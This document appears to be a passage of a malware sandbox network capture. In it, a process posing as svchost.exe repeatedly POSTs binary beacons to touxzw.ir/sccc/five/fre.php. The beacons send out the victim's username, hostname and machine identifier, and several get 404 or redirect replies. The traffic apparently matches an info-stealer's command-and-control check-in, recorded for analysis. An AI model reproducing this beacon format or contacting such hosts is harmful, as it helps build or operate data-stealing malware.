Feb 20, 2025 15:07:02.754445076 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f81e9184213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Feb 20, 2025 15:07:02.756795883 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f81e9184213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49912	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:03.951026917 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:03.956144094 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:04.711790085 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebjmgLEW%2FCqDVXzRUBFwdDbFgVplfCFz43%2BbetmytTwPmqcQODmzc6z7nU7fSZsNWouZriU%2FAKcusRBpEAPhKqOA69odp213DqDnh%2BQ1z9AdgoGyLhOvSrvdbSY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f943e26c33a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1523&rtt_var=761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49923	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:05.873155117 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:05.878160954 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:06.708833933 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHqncd9tfUYkZ%2BqcOUFH335qe5K7Z2CIArNQIK63jFXKQqe6EAxmoWvFTbaU%2FcevfgMxR95csSFCB7o4qwUuPlYz1HvIRUiA0Z6Dc1L%2F8j8VtQ0y7F7sqQbdOJ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fa049984251-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49938	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:07.968241930 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:07.973258018 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:08.770853043 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CSyVLXe4%2FOFJZvsVXAotIyzKR6jsQsbjC0ToepFZulGv6zQ7n8hY1W3R%2Fo%2BvMJs7TJOBqjY7VXjsC1Tbl%2BCeAZpa%2FYvBu0M2vPFC1pueLEu8k%2FlZUOmlxg3GNc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fad5d7a5e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49951	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:09.959754944 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:09.964813948 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:10.623655081 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQz1VExqHVT8aUOmQZAqyzUeNKkh7PX0Jt43zzKwMEoQD0%2Bb1uLdYyeG6TbVPWTZ7ahZ29JImt%2BCYqz%2BfhacNfkDh0MMUL96myBHl2UoJreFfiXIrV10nD9Nb7o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fb9dd8b4334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49961	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:11.935151100 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:11.940213919 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:12.651485920 CET	849	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64sgVpOJZcZlcGaNh%2FOrmZav3ou6o%2FIwU5UfoIoTVo17xOG%2BswjQ%2BUC2%2FMSjEwSbT7JvCcPOMIXI3CGznO719yI7%2BSvWkuZpv4ozYOB3F9JS26zlhVYueT4cSSw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fc61b5b728d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49974	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:13.827364922 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:13.832443953 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:14.466414928 CET	851	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYHXuSQnLYzb%2BsM%2BYlUxIzOloi6fzCJOrm1d%2FWHr2MBA8UZlwIlzn%2Bvzzk6YT6kkfMK0U7L9PndoSdKp8zKkHihcQi15jqfYjKBgTqv60kt%2BbIA%2BWgR%2FhCBXuSg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fd1fe06424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2072&rtt_var=1036&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49986	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:15.632596016 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:15.638534069 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:16.371341944 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:16 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QpxGj8w%2BYKKMZ%2BKCKTsE7dmLMYvj23e%2BEk61EuNGe%2BOehBOoHvWNxGVPQhLjhLvluNcQyNAISVCdCMQLzlJu0w3hltfsm4pNSOX3BKlfUdbYRBQd4%2FgaUL%2FTks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fdd3f2042b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49998	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:17.553330898 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:17.558386087 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:18.401190996 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiDxQIOoN94EiFxT5eepoWE0AdU6m7l94m10U8x1d6jNhQkDwiGdubTQQGI4DBIHp23gtoNJFRVmQYseR8pOvP9TKf1cXwa2bQ%2B7MaXBhRupyWR4llVKd9FAbe8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0fe95d530f90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50008	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:19.547914982 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:19.553016901 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:20.289845943 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:20 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9k%2FHvwtYDvkr0b41BM6kCf1dufoFm23rQVUkhtA6E0VOpBVuHGMFZ2c8oT59BOxUoqcgTaACOYCvWau4tXeLEMzbeQt%2FSImDPXGCHWuOZeNk0XyGi1sfphmIXPc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0ff5ba81423a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50010	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:21.470108032 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:21.475251913 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:22.298964024 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyREgKY5Li4kyXz5zU4Ga50lBEkA7HDge1aJVDwScs5dNJVUG9UnQIuqyfKBT5NEG7%2Fp5rYfifWXyJ8U3zqSNKPyKuOj0hrom1ZjG54wnQktzVFGeLU8TBlKb5Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1001e81b0f71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50011	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:23.452405930 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:23.458173037 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:24.195916891 CET	815	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:07:24 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IsIFpkHmv59UIf1HZyrS02ZyxPmBKhxKuvFuoTxSQ%2FzxwNXQEKRObb3QsY3ZqROxQn9Bw1tGGF2KddFkSyN83cS6G0B1wgRpxUzrUuMCKXFDXpFAsAISERXdbM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f100e29a132d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1936&rtt_var=968&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50012	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:25.362031937 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:25.367620945 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:26.167548895 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7H0vSK4bXMnVLgG1DGxX50lb0TzKB2M9b9YxuKYCSsQi9P6vt9v5QCts8REexpG34O%2BRNIQLmti%2FZhQUnz7Z13uWN1tn3E0%2BQSJCJps2%2BQI3rc0F%2BWeN2PcNVM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f101a1e774307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50013	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:27.325853109 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:27.330955982 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
